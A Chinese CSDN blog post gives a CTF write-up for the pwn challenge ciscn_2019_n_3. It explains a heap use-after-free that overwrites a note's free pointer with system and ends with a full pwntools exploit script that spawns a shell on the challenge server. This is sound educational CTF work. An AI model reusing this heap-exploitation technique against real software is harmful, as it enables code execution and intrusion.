【CTF】【PWN】【胎教向】ciscn_2019_n_3

最新推荐文章于 2024-09-11 13:41:53 发布
最新推荐文章于 2024-09-11 13:41:53 发布
阅读量196 收藏 1
点赞数 1
分类专栏: ctf pwn ciscn 文章标签: unctf 安全 安全漏洞 pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/121024981
版权

内存漏洞 堆溢出 system函数 命令注入 缓冲区操作
关键词由CSDN通过智能技术生成
ctf 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
pwn
10 篇文章 2 订阅
订阅专栏
ciscn
3 篇文章 0 订阅
订阅专栏

拖进IDA反编译。
程序有三个功能:创建NOTE,删除NOTE,print NOTE
在这里插入图片描述
创建NOTE的时候会先malloc一个固定大小为0xC的chunk。在这里插入图片描述
然后再malloc一个大小自己设置的chunk。
在这里插入图片描述
不难发现,第一个申请的chunk起到控制作用,用来存放每一个NOTE都会有的功能。
在这里插入图片描述
两个chunk之间的关系应该如下图。我们把第一个chunk命名为control,第二个chunk命名为content。control
control块有三个部分,print和free,还有ptr。ptr指向content。
若要printcontent的内容,就调用control里的print。
在这里插入图片描述

若要free这个NOTE,直接调用control里的free。
在这里插入图片描述

在这里插入图片描述
创建NOTE有两个类型,一个是text,一个是int。两个NOTE有不同的点就是free的时候有区别。这是一个利用点!
在这里插入图片描述
free掉int的时候只free了control块。
在这里插入图片描述
free掉text的时候free了control和content两个块。
在这里插入图片描述

思路就已经很明显了。我们把control块的free改成system,然后再把records表里的对应的地址改成/bin/sh。这样我们free掉对应的NOTE时,就相当于system(’/bin/sh’)。
在这里插入图片描述
下面是攻击流程:
先创建一个text类型的NOTE1,大小定义为0xC,这样就会申请出来两个大小都为0xC的chunk.一个control一个content。
然后创建一个int类型的NOTE2。这样申请出来一个control。
再创建一个int类型的NOTE5。申请出来一个control。
再申请一个text类型的NOTE3,只是为了分隔TOPCHUNK。
现在我们的堆分布情况如下:

在这里插入图片描述
然后我们free掉NOTE1,会先free掉content1,然后free掉control。
fastbins的情况应该如下:
在这里插入图片描述
然后我们再free掉NOTE2,只会free掉一个control2.fastbins的情况如下:
在这里插入图片描述
那么这个时候如果我们申请一个text类型的,大小为0xC的NOTE4。会取出control2作为这个NOTE4的control,取出control1作为这个control的content部分。堆块的分布如下:
在这里插入图片描述
如果我们申请的这个NOTE4的内容是system函数,那么就相当于会在control1里面存system函数。但是control1又是NOTE1的控制块,所以就大有可为了。
然后我们再free掉NOTE5,这个时候只会free掉一个control5。这个时候fastbins和堆块分布图如下:
在这里插入图片描述
在这里插入图片描述
虽然图中control5和content1不一样大,但是我们实际上通过控制申请的大小,两者是一样大小的。
这个时候我们再次申请一个NOTE6,就会把control5申请回来做为NOTE6的control,把content1申请回来作为NOTE6的content。这个时候就可以往content1里面填/bin/sh。申请回来还是放在原位置。堆块分布如下:
在这里插入图片描述
可以发现:control1的free部分被改成了system,content1被改成了/bin/sh。
那么我们只需再次free掉NOTE1,便可以达到system(’/bin/sh’)。
代码如下:

from pwn import *
from LibcSearcher import *
r=remote('node4.buuoj.cn','26713')
#r=remote('node4.buuoj.cn','26799')
#r=process('./b')
elf=ELF('./b')
context.log_level = 'debug'
libc = ELF("./libc-2.23-32.so")
#context.terminal = ['tmux','splitw','-h']
def add(idx,length,value):
    r.recvuntil("> ")
    r.sendline('1')
    r.recvuntil("> ")
    r.sendline(str(idx))
    r.recvuntil("> ")
    r.sendline('2')
    r.recvuntil("> ")
    r.sendline(str(length))
    r.recvuntil("> ")
    r.sendline(str(value))
def addint(idx,value):
    r.recvuntil("> ")
    r.sendline('1')
    r.recvuntil("> ")
    r.sendline(str(idx))
    r.recvuntil("> ")
    r.sendline('1')
    r.recvuntil("> ")
    r.sendline(str(value))    
def delete(idx):
    r.recvuntil("> ")
    r.sendline('2')
    r.recvuntil("> ")
    r.sendline(str(idx))
def show(idx):
    r.recvuntil("> ")
    r.sendline('3')
    r.recvuntil("> ")
    r.sendline(str(idx))
def purchase():
    r.recvuntil("> ")
    r.sendline('4')
free_got=elf.got['free']
system_plt=elf.plt['system']

add(1,0xC,'aaaa')
addint(2,300)

addint(5,300)
add(3,0x10,'bbbb')
delete(1)
delete(2)
payload='bash'+p32(system_plt)
add(4,0xC,payload)
delete(5)
payload='/bin/sh\x00'
add(6,0xC,payload)
delete(1)
r.interactive()
永远在深夜里就好了
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ciscn2019 pwn3
pondzhang的专栏
05-26 378
from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin
pwn ciscn_2019_s_3
beaster1的博客
03-23 201
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
ctf pwn buuctf ciscn_2019_n_1
orange_cat__的博客
11-16 226
主要思路就是覆盖v2的地址为11.28125,利用gets函数输入v1时存在的栈溢出漏洞。图上箭头指的为11.28125的16进制。调用了func()函数,进去后分析。v1距离v2为16×3-4=44.四,打开靶机,写payload。三,找payload所需条件。NX保护,堆栈不可执行。五,打通获得flag。
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 304
BUUCTF 做题练习
CTFciscn_2019_n_1和pwn1_sctf_2016--栈溢出
网络安全从业者的学习笔记
04-14 440
BUUICTFciscn_2019_n_1和pwn1_sctf_2016--栈溢出类型解题思路
【BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 373
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 374
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF-PWN-ciscn_2019_n_1
m0_64180167的博客
04-13 318
我们可以使用栈溢出 我们看看 v1函数的地址 是30h 然后是64位的 所以 基地址是8字节。我们发现了system 然后get()函数。所以发现system的地址 开始写exp。发现是64位的 然后 放入ida。我们开始查看 system的地址。发现 cat flag。
BUU CTF PWN ciscn_2019_n_1 WriteUp
m0sway的博客
02-28 254
BUU CTF PWNciscn_2019_n_1的WriteUp
ctfciscn_2019_n_8】
HUANGliang_的博客
10-29 275
缓冲区溢出漏洞
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 631
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
CTF】【PWNciscn_s_3题解
m0_50819561的博客
09-23 766
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2426
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
浅谈网络安全的认识与学习规划
qq_201729558
09-05 963
本文主要介绍网络安全认识与学习规划
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 571
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 786
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
SSHamble:一款针对SSH技术安全的研究与分析工具
最新发布
FreeBuf_的博客
09-11 680
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 933
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
本笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值